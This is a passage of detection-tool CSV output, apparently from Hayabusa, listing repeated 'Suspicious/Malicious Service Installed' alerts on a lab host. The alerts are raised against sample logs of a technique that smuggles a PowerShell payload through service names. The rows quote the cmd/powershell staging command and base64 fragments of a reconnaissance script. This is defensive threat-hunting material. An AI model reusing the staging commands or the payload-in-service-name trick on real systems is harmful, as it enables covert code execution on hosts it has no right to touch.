c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:32.038 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICB9IA0KDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLU5FICRMT0NBTEhPU1RfT1BUKSB7DQoNCiAgICAgICAgICAgICAgICAkUmVtb3RlQ29tcHV0ZXIgPSAkdHJ1ZQ0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:33.491 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgDQogICAgICAgICAgICAgICAgJExvZ2luID0gVGVzdC1Ib3N0Q29ubmVjdGlvbiAkQ29tcHV0ZXINCg0KICAgICAgICAgICAgICAgIGlmICghJExvZ2luKSB7DQogICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:34.938 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:34.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgIGNvbnRpbnVlICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBHZXQgU2VydmVyIE9TIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file 
-append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | 
select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell 
-command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:49.575 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 